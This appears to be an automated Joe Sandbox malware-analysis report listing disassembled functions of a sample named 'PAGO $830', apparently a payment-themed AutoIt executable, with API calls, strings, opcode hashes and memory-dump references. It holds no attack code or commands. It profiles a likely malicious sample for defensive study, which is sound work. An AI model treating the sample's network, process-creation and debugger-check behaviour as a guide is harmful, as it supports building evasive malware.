                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 0d080532b526e8232500c74889abd3e3322dbfbbca53d3c4d1d6d505b6166047
                                                          • Instruction ID: a8e3f8b26ceb241e4ea702a359ab83f1f6741c0d4380daf93e20aff75aa47d4c
                                                          • Opcode Fuzzy Hash: 0d080532b526e8232500c74889abd3e3322dbfbbca53d3c4d1d6d505b6166047
                                                          • Instruction Fuzzy Hash: 025148714187449BD320AF11D886BAFBBE8FF84344F81885DF1D9511A1EB308929CB77
                                                          Function 00DF566C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper_wcslen
                                                          • String ID: CALLARGARRAY
                                                          • API String ID: 157775604-1150593374
                                                          • Opcode ID: c7286bfc8fb81f8cfba98f928abbb7f9bbc85735ffb89fb198415af124205424
                                                          • Instruction ID: a3c87f34dfb63fdac17afc939f45e00f297bb22f3b13eedaa73ed086ffe9b5ce
                                                          • Opcode Fuzzy Hash: c7286bfc8fb81f8cfba98f928abbb7f9bbc85735ffb89fb198415af124205424
                                                          • Instruction Fuzzy Hash: 7641A271A00209DFCB04EFA4D8859BEBBF5FF59324F158029E605AB251EB719D81CBB0
                                                          Function 00DED012 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DED04E
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DED058
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_wcslen
                                                          • String ID: |
                                                          • API String ID: 596671847-2343686810
                                                          • Opcode ID: 7753018c16d18c99a9528e4c528920a3fc4bb96b5fbb38fa5c9b36945fd10023
                                                          • Instruction ID: ada163796b921ca3d62e02f1138a508f6cc277b98a7b9d758e9bfdccb9badbd8
                                                          • Opcode Fuzzy Hash: 7753018c16d18c99a9528e4c528920a3fc4bb96b5fbb38fa5c9b36945fd10023
                                                          • Instruction Fuzzy Hash: B4311A71D01209ABCF11AFA5DC85AEE7FB9FF04340F144029F819A6166EB319956DB70
                                                          Function 00E0349F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00E03554
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E0358F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 46ee1b50c5b678157fe41992af7b0f2d26c637dc7136ab27ce5e6f6eadb0d8ca
                                                          • Instruction ID: ee8a87573d065e623750c778da92169cabedd58470f74634119b50f221be910f
                                                          • Opcode Fuzzy Hash: 46ee1b50c5b678157fe41992af7b0f2d26c637dc7136ab27ce5e6f6eadb0d8ca
                                                          • Instruction Fuzzy Hash: A0319E71100604AEDB159F78DC80AFB73ADFF48724F10A619F9A9A7190DA31EDC5CB60
                                                          Function 00E0446C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E04554
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E04569
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: dda7404c86954b5a985296eb104842f8b1bdc896588620e232f2e149be0408c3
                                                          • Instruction ID: d67bedfc8068f53f3582446ae994de5477ff69d206ddc70018690a4464786777
                                                          • Opcode Fuzzy Hash: dda7404c86954b5a985296eb104842f8b1bdc896588620e232f2e149be0408c3
                                                          • Instruction Fuzzy Hash: CF3139B5A003099FDB14DFA9DA80BDA7BB5FF09304F10516AEA04AB391D770A981CF90
                                                          Function 00E03122 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E031AF
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E031BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: c3c0dfd9f9680bf6e40ddf851337362aad914f0c500cd2116824e572857f8516
                                                          • Instruction ID: b8ce129724365905d73f053af4cd4231adc6c03d6015322f742330bd5eed6d68
                                                          • Opcode Fuzzy Hash: c3c0dfd9f9680bf6e40ddf851337362aad914f0c500cd2116824e572857f8516
                                                          • Instruction Fuzzy Hash: 881190713012086FEF259F64DC80EAB37AEEB59368F105228F958AB2D0D6719D9187A0
                                                          Function 00E03643 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D779B6: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D779F4
                                                            • Part of subcall function 00D779B6: GetStockObject.GDI32(00000011), ref: 00D77A08
                                                            • Part of subcall function 00D779B6: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D77A12
                                                          • GetWindowRect.USER32(00000000,?), ref: 00E036AD
                                                          • GetSysColor.USER32(00000012), ref: 00E036C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 199d72181cd8381e768a49494e9238c07de28c206db5064e666cf99dc8881161
                                                          • Instruction ID: 9453c2a3caba36c87415a2951c9640c661966751bfe7fb6ba727c6f278b93955
                                                          • Opcode Fuzzy Hash: 199d72181cd8381e768a49494e9238c07de28c206db5064e666cf99dc8881161
                                                          • Instruction Fuzzy Hash: 9E115972610209AFDB00DFB8DC45AEA7BA8EB08304F105525FD56E3290E736E894DB60
                                                          Function 00DECC3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DECC9B
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DECCC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 052d5e4dfe1010ef4fde33eac3cd5edc778853825d356317ec6b5d70b9b44093
                                                          • Instruction ID: 9df4f009c166f4add99b5138620d23f43128dedbc93d31ebd7e5ed6a1ee7d73f
                                                          • Opcode Fuzzy Hash: 052d5e4dfe1010ef4fde33eac3cd5edc778853825d356317ec6b5d70b9b44093
                                                          • Instruction Fuzzy Hash: 08112571221672BAD7385B638C48EF7BE9CEF127A4F24621AB15E93180D3608846C6F0
                                                          Function 00E0335C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00E033DE
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E033ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: c8a54f68c42fcab45e7cd517b1647a991c166fafab58316889a6b7740fdd06f8
                                                          • Instruction ID: db97b295809e0e1296616bcda63028841cfaff0993a1b424b7c51500ee933295
                                                          • Opcode Fuzzy Hash: c8a54f68c42fcab45e7cd517b1647a991c166fafab58316889a6b7740fdd06f8
                                                          • Instruction Fuzzy Hash: D9116D71500209AFEB208F74DC84AEA3B6EEB15368F205714F974A71D0DB75DC919B60
                                                          Function 00DD6BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00DD6C0C
                                                          • _wcslen.LIBCMT ref: 00DD6C18
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: STOP
                                                          • API String ID: 1256254125-2411985666
                                                          • Opcode ID: a385b6906283e970235feb8ce9cce7899bb84a3f16e23a1d18a794b01724f786
                                                          • Instruction ID: 94c0dec7cbdcc5932f2a85d7171671cb05af509073836fae9fb7d8e33aa8a3fa
                                                          • Opcode Fuzzy Hash: a385b6906283e970235feb8ce9cce7899bb84a3f16e23a1d18a794b01724f786
                                                          • Instruction Fuzzy Hash: 2401C8326205278ACB109FBDCC8097F7BA9EF617107540526E8A597291FF31E944C6B0
                                                          Function 00DD1BA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                            • Part of subcall function 00DD3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3C12
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DD1C0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 624084870-1403004172
                                                          • Opcode ID: 846f4521a9ddebf17f851e67512534ae6eb35ce89ba46626476e4861e0c65901
                                                          • Instruction ID: fded7b18f9884f51e594a7ce3b0fdf568f9f939e29555dc8d7c4fccaa502eb92
                                                          • Opcode Fuzzy Hash: 846f4521a9ddebf17f851e67512534ae6eb35ce89ba46626476e4861e0c65901
                                                          • Instruction Fuzzy Hash: B401A776B812047ACB14EBA5C951EFEB7A8CB11350F544017B846B7381EA21CE098672
                                                          Function 00E08064 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E43008,00E4304C), ref: 00E080B1
                                                          • CloseHandle.KERNEL32 ref: 00E080C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: L0
                                                          • API String ID: 3712363035-3745075247
                                                          • Opcode ID: 4e07312b7b37f2fed932d347220df4eee2f5110647fcbf3a522f42de2310d91a
                                                          • Instruction ID: 55bce0cc6611266e15ae7daaf9f0612a87cae89d9cefbba5c577a2d8d0f10bf5
                                                          • Opcode Fuzzy Hash: 4e07312b7b37f2fed932d347220df4eee2f5110647fcbf3a522f42de2310d91a
                                                          • Instruction Fuzzy Hash: 5FF082B5541304BEF7206B72BC46F777E6CEB05750F104220BA08F61A1D6768E4883B8
                                                          Function 00DF73A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: 3, 3, 16, 0
                                                          • API String ID: 176396367-3261555341
                                                          • Opcode ID: 59687f71429de523b5c57829d4f95c6437a7712f615c5189f0ebe0fd80a72ff5
                                                          • Instruction ID: 2024c39c5d2a6183a7849ed9209be02bd09128215af73ac50ad58343951329a4
                                                          • Opcode Fuzzy Hash: 59687f71429de523b5c57829d4f95c6437a7712f615c5189f0ebe0fd80a72ff5
                                                          • Instruction Fuzzy Hash: D2E0654630436431973112799D85DBF55C9EFC9751B15242AFA91C2266EB918C92A3B0
                                                          Function 00DD0A59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DD0A67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 2030045667-4017498283
                                                          • Opcode ID: fd04af63608c9475772b8debf1bb73e11c7ca163b7576e6e1793e3a90b6889ae
                                                          • Instruction ID: 704fb697cddbd3f9241d924f01b3b89713c87162e39ba32e64632dc2f6fefd47
                                                          • Opcode Fuzzy Hash: fd04af63608c9475772b8debf1bb73e11c7ca163b7576e6e1793e3a90b6889ae
                                                          • Instruction Fuzzy Hash: 66E04F3238835866D21437A4AC07F8A7E88CF49B21F24442AF748B95C38EE264D057B9
                                                          Function 00D90CC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8F8A8: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D90CF1,?,?,?,00D7100A), ref: 00D8F8AD
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00D7100A), ref: 00D90CF5
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D7100A), ref: 00D90D04
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D90CFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 55579361-631824599
                                                          • Opcode ID: ef6c85975d351c6d28ac12ddb6d1dbbdf4b761dd0256a917259d8caebd60b49d
                                                          • Instruction ID: 631403202698a8ef62ff9b4ef7e1b07c1757766f9a485009db7c9b0ddcf57df8
                                                          • Opcode Fuzzy Hash: ef6c85975d351c6d28ac12ddb6d1dbbdf4b761dd0256a917259d8caebd60b49d
                                                          • Instruction Fuzzy Hash: C8E06D702007008FDB709FA9E8043427BE4EB00751F10892CE486D2AA1DBB5E4888BB1
                                                          Function 00D8E364 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D8E3A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: 0%$8%
                                                          • API String ID: 1385522511-2949748613
                                                          • Opcode ID: c2a94968a184b8f15fc443fe020ba0405ca8b1a4127ae39a818b47fa3c8a7367
                                                          • Instruction ID: 4cf36f7cc19024eacb03146fb40cef7fd15fecfe2f714f3ebc4ee0f560c0eda1
                                                          • Opcode Fuzzy Hash: c2a94968a184b8f15fc443fe020ba0405ca8b1a4127ae39a818b47fa3c8a7367
                                                          • Instruction Fuzzy Hash: A2E02636010E208FCB04B719F8559883351EB46322B90916DF201E71918B289C428F36
                                                          Function 00DCD9B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: %.3d$X64
                                                          • API String ID: 481472006-1077770165
                                                          • Opcode ID: a2a50ce5db6555ef43cb60e5242ba9835497846b444a01429bd5eb3389baaa82
                                                          • Instruction ID: f82b0ebde67f1086a1e7d44469e692aec713327635ffc8b5e845f8c8c8572d7a
                                                          • Opcode Fuzzy Hash: a2a50ce5db6555ef43cb60e5242ba9835497846b444a01429bd5eb3389baaa82
                                                          • Instruction Fuzzy Hash: C5D01265848109D9CB809B908C49DB9777DAB18300F604466F886E3040E634C648AB31
                                                          Function 00E02289 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0229F
                                                          • PostMessageW.USER32(00000000), ref: 00E022A6
                                                            • Part of subcall function 00DDE899: Sleep.KERNEL32 ref: 00DDE911
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
